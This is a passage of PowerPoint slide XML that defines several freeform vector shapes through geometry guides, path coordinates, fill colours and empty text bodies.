                    <a:lnTo>
                      <a:pt x="11" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="39"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36383" name="Freeform 115"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3418" y="2637"/>
                <a:ext cx="163" cy="105"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 160 w 163"/>
                  <a:gd name="T1" fmla="*/ 40 h 105"/>
                  <a:gd name="T2" fmla="*/ 152 w 163"/>
                  <a:gd name="T3" fmla="*/ 46 h 105"/>
                  <a:gd name="T4" fmla="*/ 149 w 163"/>
                  <a:gd name="T5" fmla="*/ 52 h 105"/>
                  <a:gd name="T6" fmla="*/ 145 w 163"/>
                  <a:gd name="T7" fmla="*/ 57 h 105"/>
                  <a:gd name="T8" fmla="*/ 119 w 163"/>
                  <a:gd name="T9" fmla="*/ 67 h 105"/>
                  <a:gd name="T10" fmla="*/ 104 w 163"/>
                  <a:gd name="T11" fmla="*/ 72 h 105"/>
                  <a:gd name="T12" fmla="*/ 98 w 163"/>
                  <a:gd name="T13" fmla="*/ 79 h 105"/>
                  <a:gd name="T14" fmla="*/ 91 w 163"/>
                  <a:gd name="T15" fmla="*/ 82 h 105"/>
                  <a:gd name="T16" fmla="*/ 83 w 163"/>
                  <a:gd name="T17" fmla="*/ 82 h 105"/>
                  <a:gd name="T18" fmla="*/ 73 w 163"/>
                  <a:gd name="T19" fmla="*/ 88 h 105"/>
                  <a:gd name="T20" fmla="*/ 61 w 163"/>
                  <a:gd name="T21" fmla="*/ 92 h 105"/>
                  <a:gd name="T22" fmla="*/ 48 w 163"/>
                  <a:gd name="T23" fmla="*/ 92 h 105"/>
                  <a:gd name="T24" fmla="*/ 43 w 163"/>
                  <a:gd name="T25" fmla="*/ 96 h 105"/>
                  <a:gd name="T26" fmla="*/ 38 w 163"/>
                  <a:gd name="T27" fmla="*/ 100 h 105"/>
                  <a:gd name="T28" fmla="*/ 32 w 163"/>
                  <a:gd name="T29" fmla="*/ 102 h 105"/>
                  <a:gd name="T30" fmla="*/ 26 w 163"/>
                  <a:gd name="T31" fmla="*/ 105 h 105"/>
                  <a:gd name="T32" fmla="*/ 17 w 163"/>
                  <a:gd name="T33" fmla="*/ 104 h 105"/>
                  <a:gd name="T34" fmla="*/ 11 w 163"/>
                  <a:gd name="T35" fmla="*/ 100 h 105"/>
                  <a:gd name="T36" fmla="*/ 8 w 163"/>
                  <a:gd name="T37" fmla="*/ 95 h 105"/>
                  <a:gd name="T38" fmla="*/ 9 w 163"/>
                  <a:gd name="T39" fmla="*/ 85 h 105"/>
                  <a:gd name="T40" fmla="*/ 4 w 163"/>
                  <a:gd name="T41" fmla="*/ 73 h 105"/>
                  <a:gd name="T42" fmla="*/ 0 w 163"/>
                  <a:gd name="T43" fmla="*/ 55 h 105"/>
                  <a:gd name="T44" fmla="*/ 1 w 163"/>
                  <a:gd name="T45" fmla="*/ 45 h 105"/>
                  <a:gd name="T46" fmla="*/ 7 w 163"/>
                  <a:gd name="T47" fmla="*/ 36 h 105"/>
                  <a:gd name="T48" fmla="*/ 7 w 163"/>
                  <a:gd name="T49" fmla="*/ 27 h 105"/>
                  <a:gd name="T50" fmla="*/ 10 w 163"/>
                  <a:gd name="T51" fmla="*/ 25 h 105"/>
                  <a:gd name="T52" fmla="*/ 18 w 163"/>
                  <a:gd name="T53" fmla="*/ 27 h 105"/>
                  <a:gd name="T54" fmla="*/ 26 w 163"/>
                  <a:gd name="T55" fmla="*/ 27 h 105"/>
                  <a:gd name="T56" fmla="*/ 44 w 163"/>
                  <a:gd name="T57" fmla="*/ 65 h 105"/>
                  <a:gd name="T58" fmla="*/ 72 w 163"/>
                  <a:gd name="T59" fmla="*/ 29 h 105"/>
                  <a:gd name="T60" fmla="*/ 75 w 163"/>
                  <a:gd name="T61" fmla="*/ 25 h 105"/>
                  <a:gd name="T62" fmla="*/ 111 w 163"/>
                  <a:gd name="T63" fmla="*/ 11 h 105"/>
                  <a:gd name="T64" fmla="*/ 142 w 163"/>
                  <a:gd name="T65" fmla="*/ 1 h 105"/>
                  <a:gd name="T66" fmla="*/ 144 w 163"/>
                  <a:gd name="T67" fmla="*/ 5 h 105"/>
                  <a:gd name="T68" fmla="*/ 150 w 163"/>
                  <a:gd name="T69" fmla="*/ 17 h 105"/>
                  <a:gd name="T70" fmla="*/ 157 w 163"/>
                  <a:gd name="T71" fmla="*/ 29 h 105"/>
                  <a:gd name="T72" fmla="*/ 161 w 163"/>
                  <a:gd name="T73" fmla="*/ 37 h 105"/>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63"/>
                  <a:gd name="T112" fmla="*/ 0 h 105"/>
                  <a:gd name="T113" fmla="*/ 163 w 163"/>
                  <a:gd name="T114" fmla="*/ 105 h 105"/>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63" h="105">
                    <a:moveTo>
                      <a:pt x="163" y="39"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="160" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="39"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36384" name="Freeform 116"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3207" y="2880"/>
                <a:ext cx="88" cy="88"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 88"/>
                  <a:gd name="T1" fmla="*/ 86 h 88"/>
                  <a:gd name="T2" fmla="*/ 2 w 88"/>
                  <a:gd name="T3" fmla="*/ 84 h 88"/>
                  <a:gd name="T4" fmla="*/ 2 w 88"/>
                  <a:gd name="T5" fmla="*/ 82 h 88"/>
                  <a:gd name="T6" fmla="*/ 2 w 88"/>
                  <a:gd name="T7" fmla="*/ 77 h 88"/>
                  <a:gd name="T8" fmla="*/ 2 w 88"/>
                  <a:gd name="T9" fmla="*/ 72 h 88"/>
                  <a:gd name="T10" fmla="*/ 2 w 88"/>
                  <a:gd name="T11" fmla="*/ 67 h 88"/>
                  <a:gd name="T12" fmla="*/ 3 w 88"/>
                  <a:gd name="T13" fmla="*/ 64 h 88"/>
                  <a:gd name="T14" fmla="*/ 4 w 88"/>
                  <a:gd name="T15" fmla="*/ 57 h 88"/>
                  <a:gd name="T16" fmla="*/ 7 w 88"/>
                  <a:gd name="T17" fmla="*/ 52 h 88"/>
                  <a:gd name="T18" fmla="*/ 9 w 88"/>
                  <a:gd name="T19" fmla="*/ 50 h 88"/>
                  <a:gd name="T20" fmla="*/ 18 w 88"/>
                  <a:gd name="T21" fmla="*/ 43 h 88"/>
                  <a:gd name="T22" fmla="*/ 26 w 88"/>
                  <a:gd name="T23" fmla="*/ 35 h 88"/>
                  <a:gd name="T24" fmla="*/ 28 w 88"/>
                  <a:gd name="T25" fmla="*/ 32 h 88"/>
                  <a:gd name="T26" fmla="*/ 27 w 88"/>
                  <a:gd name="T27" fmla="*/ 30 h 88"/>
                  <a:gd name="T28" fmla="*/ 25 w 88"/>
                  <a:gd name="T29" fmla="*/ 28 h 88"/>
                  <a:gd name="T30" fmla="*/ 22 w 88"/>
                  <a:gd name="T31" fmla="*/ 28 h 88"/>
                  <a:gd name="T32" fmla="*/ 20 w 88"/>
                  <a:gd name="T33" fmla="*/ 28 h 88"/>
                  <a:gd name="T34" fmla="*/ 19 w 88"/>
                  <a:gd name="T35" fmla="*/ 26 h 88"/>
                  <a:gd name="T36" fmla="*/ 21 w 88"/>
                  <a:gd name="T37" fmla="*/ 13 h 88"/>
                  <a:gd name="T38" fmla="*/ 21 w 88"/>
                  <a:gd name="T39" fmla="*/ 10 h 88"/>
                  <a:gd name="T40" fmla="*/ 20 w 88"/>
                  <a:gd name="T41" fmla="*/ 8 h 88"/>
                  <a:gd name="T42" fmla="*/ 20 w 88"/>
                  <a:gd name="T43" fmla="*/ 8 h 88"/>
                  <a:gd name="T44" fmla="*/ 23 w 88"/>
                  <a:gd name="T45" fmla="*/ 6 h 88"/>
                  <a:gd name="T46" fmla="*/ 26 w 88"/>
                  <a:gd name="T47" fmla="*/ 6 h 88"/>
                  <a:gd name="T48" fmla="*/ 30 w 88"/>
                  <a:gd name="T49" fmla="*/ 6 h 88"/>
                  <a:gd name="T50" fmla="*/ 37 w 88"/>
                  <a:gd name="T51" fmla="*/ 8 h 88"/>
                  <a:gd name="T52" fmla="*/ 44 w 88"/>
                  <a:gd name="T53" fmla="*/ 7 h 88"/>
                  <a:gd name="T54" fmla="*/ 50 w 88"/>
                  <a:gd name="T55" fmla="*/ 5 h 88"/>
                  <a:gd name="T56" fmla="*/ 56 w 88"/>
                  <a:gd name="T57" fmla="*/ 4 h 88"/>
                  <a:gd name="T58" fmla="*/ 58 w 88"/>
                  <a:gd name="T59" fmla="*/ 5 h 88"/>
                  <a:gd name="T60" fmla="*/ 60 w 88"/>
                  <a:gd name="T61" fmla="*/ 6 h 88"/>
                  <a:gd name="T62" fmla="*/ 63 w 88"/>
                  <a:gd name="T63" fmla="*/ 6 h 88"/>
                  <a:gd name="T64" fmla="*/ 67 w 88"/>
                  <a:gd name="T65" fmla="*/ 4 h 88"/>
                  <a:gd name="T66" fmla="*/ 71 w 88"/>
                  <a:gd name="T67" fmla="*/ 0 h 88"/>
                  <a:gd name="T68" fmla="*/ 74 w 88"/>
                  <a:gd name="T69" fmla="*/ 3 h 88"/>
                  <a:gd name="T70" fmla="*/ 77 w 88"/>
                  <a:gd name="T71" fmla="*/ 7 h 88"/>
                  <a:gd name="T72" fmla="*/ 78 w 88"/>
                  <a:gd name="T73" fmla="*/ 8 h 88"/>
                  <a:gd name="T74" fmla="*/ 78 w 88"/>
                  <a:gd name="T75" fmla="*/ 14 h 88"/>
                  <a:gd name="T76" fmla="*/ 79 w 88"/>
                  <a:gd name="T77" fmla="*/ 18 h 88"/>
                  <a:gd name="T78" fmla="*/ 85 w 88"/>
                  <a:gd name="T79" fmla="*/ 25 h 88"/>
                  <a:gd name="T80" fmla="*/ 86 w 88"/>
                  <a:gd name="T81" fmla="*/ 28 h 88"/>
                  <a:gd name="T82" fmla="*/ 88 w 88"/>
                  <a:gd name="T83" fmla="*/ 32 h 88"/>
                  <a:gd name="T84" fmla="*/ 88 w 88"/>
                  <a:gd name="T85" fmla="*/ 37 h 88"/>
                  <a:gd name="T86" fmla="*/ 87 w 88"/>
                  <a:gd name="T87" fmla="*/ 41 h 88"/>
                  <a:gd name="T88" fmla="*/ 84 w 88"/>
                  <a:gd name="T89" fmla="*/ 46 h 88"/>
                  <a:gd name="T90" fmla="*/ 81 w 88"/>
                  <a:gd name="T91" fmla="*/ 50 h 88"/>
                  <a:gd name="T92" fmla="*/ 74 w 88"/>
                  <a:gd name="T93" fmla="*/ 56 h 88"/>
                  <a:gd name="T94" fmla="*/ 69 w 88"/>
                  <a:gd name="T95" fmla="*/ 62 h 88"/>
                  <a:gd name="T96" fmla="*/ 68 w 88"/>
                  <a:gd name="T97" fmla="*/ 64 h 88"/>
                  <a:gd name="T98" fmla="*/ 60 w 88"/>
                  <a:gd name="T99" fmla="*/ 82 h 88"/>
                  <a:gd name="T100" fmla="*/ 26 w 88"/>
                  <a:gd name="T101" fmla="*/ 82 h 88"/>
                  <a:gd name="T102" fmla="*/ 17 w 88"/>
                  <a:gd name="T103" fmla="*/ 82 h 88"/>
                  <a:gd name="T104" fmla="*/ 15 w 88"/>
                  <a:gd name="T105" fmla="*/ 82 h 88"/>
                  <a:gd name="T106" fmla="*/ 11 w 88"/>
                  <a:gd name="T107" fmla="*/ 85 h 88"/>
                  <a:gd name="T108" fmla="*/ 8 w 88"/>
                  <a:gd name="T109" fmla="*/ 88 h 88"/>
                  <a:gd name="T110" fmla="*/ 5 w 88"/>
                  <a:gd name="T111" fmla="*/ 88 h 88"/>
                  <a:gd name="T112" fmla="*/ 1 w 88"/>
                  <a:gd name="T113" fmla="*/ 87 h 88"/>
                  <a:gd name="T114" fmla="*/ 0 w 88"/>
                  <a:gd name="T115" fmla="*/ 86 h 88"/>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88"/>
                  <a:gd name="T175" fmla="*/ 0 h 88"/>
                  <a:gd name="T176" fmla="*/ 88 w 88"/>
                  <a:gd name="T177" fmla="*/ 88 h 88"/>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88" h="88">
                    <a:moveTo>
                      <a:pt x="0" y="86"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="86"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36385" name="Freeform 117"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3207" y="2880"/>
                <a:ext cx="88" cy="88"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 88"/>
                  <a:gd name="T1" fmla="*/ 86 h 88"/>
                  <a:gd name="T2" fmla="*/ 2 w 88"/>
                  <a:gd name="T3" fmla="*/ 84 h 88"/>
                  <a:gd name="T4" fmla="*/ 2 w 88"/>
                  <a:gd name="T5" fmla="*/ 82 h 88"/>
                  <a:gd name="T6" fmla="*/ 2 w 88"/>
                  <a:gd name="T7" fmla="*/ 77 h 88"/>
                  <a:gd name="T8" fmla="*/ 2 w 88"/>
                  <a:gd name="T9" fmla="*/ 72 h 88"/>
                  <a:gd name="T10" fmla="*/ 2 w 88"/>
                  <a:gd name="T11" fmla="*/ 67 h 88"/>
                  <a:gd name="T12" fmla="*/ 3 w 88"/>
                  <a:gd name="T13" fmla="*/ 64 h 88"/>
                  <a:gd name="T14" fmla="*/ 4 w 88"/>
                  <a:gd name="T15" fmla="*/ 57 h 88"/>
                  <a:gd name="T16" fmla="*/ 7 w 88"/>
                  <a:gd name="T17" fmla="*/ 52 h 88"/>
                  <a:gd name="T18" fmla="*/ 9 w 88"/>
                  <a:gd name="T19" fmla="*/ 50 h 88"/>
                  <a:gd name="T20" fmla="*/ 18 w 88"/>
                  <a:gd name="T21" fmla="*/ 43 h 88"/>
                  <a:gd name="T22" fmla="*/ 26 w 88"/>
                  <a:gd name="T23" fmla="*/ 35 h 88"/>
                  <a:gd name="T24" fmla="*/ 28 w 88"/>
                  <a:gd name="T25" fmla="*/ 32 h 88"/>
                  <a:gd name="T26" fmla="*/ 27 w 88"/>
                  <a:gd name="T27" fmla="*/ 30 h 88"/>
                  <a:gd name="T28" fmla="*/ 25 w 88"/>
                  <a:gd name="T29" fmla="*/ 28 h 88"/>
                  <a:gd name="T30" fmla="*/ 22 w 88"/>
                  <a:gd name="T31" fmla="*/ 28 h 88"/>
                  <a:gd name="T32" fmla="*/ 20 w 88"/>
                  <a:gd name="T33" fmla="*/ 28 h 88"/>
                  <a:gd name="T34" fmla="*/ 19 w 88"/>
                  <a:gd name="T35" fmla="*/ 26 h 88"/>
                  <a:gd name="T36" fmla="*/ 21 w 88"/>
